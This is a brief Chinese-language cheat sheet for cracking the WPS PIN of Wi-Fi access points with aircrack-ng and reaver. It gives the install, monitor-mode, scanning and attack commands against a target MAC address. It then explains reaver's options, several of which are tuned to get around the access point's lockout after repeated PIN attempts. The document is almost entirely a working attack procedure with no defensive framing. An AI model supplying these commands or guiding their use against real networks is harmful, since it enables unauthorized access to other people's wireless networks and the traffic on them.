安装工具 sudo apt-get install aircrack-ng & reaver
查看网卡 ifconfig 或 sudo airmon-ng
开启监听 sudo airmon-ng start wlp8s0
探测网络 sudo airodump-ng wlp8s0mon0
开始破解 reaver -i wlp8s0mon0 -b MAC -a -S -v -d 5
reaver详解
-s *.wps 继续wps文件的进程
-o * 输出到文件
-N 不发送nack,防止pin不动
-c * 指定通道(Chanel),可减少检测时间浪费
-p **** 确定前四位是****时使用
-l, –lock-delay= Set the time to wait if the AP locks WPS pin attempts [60]
AP锁定WPS后等待时间
-g, –max-attempts= Quit after num pin attempts
最大pin次数
-x, –fail-wait= Set the time to sleep after 10 unexpected failures [0]
10次意外失败后等待时间,默认0秒
-r, –recurring-delay= Sleep for y seconds every x pin attempts
每x次pin后等待y秒
-t, –timeout= Set the receive timeout period [5]
收包超时,默认5秒
-d, –delay= Set the delay between pin attempts 1
pin间延时,默认1秒,推荐设0
-T, –m57-timeout= Set the M5/M7 timeout period [0.20]
M5/M7超时,默认0.2秒
参考链接
https://linux.cn/article-2382-1.html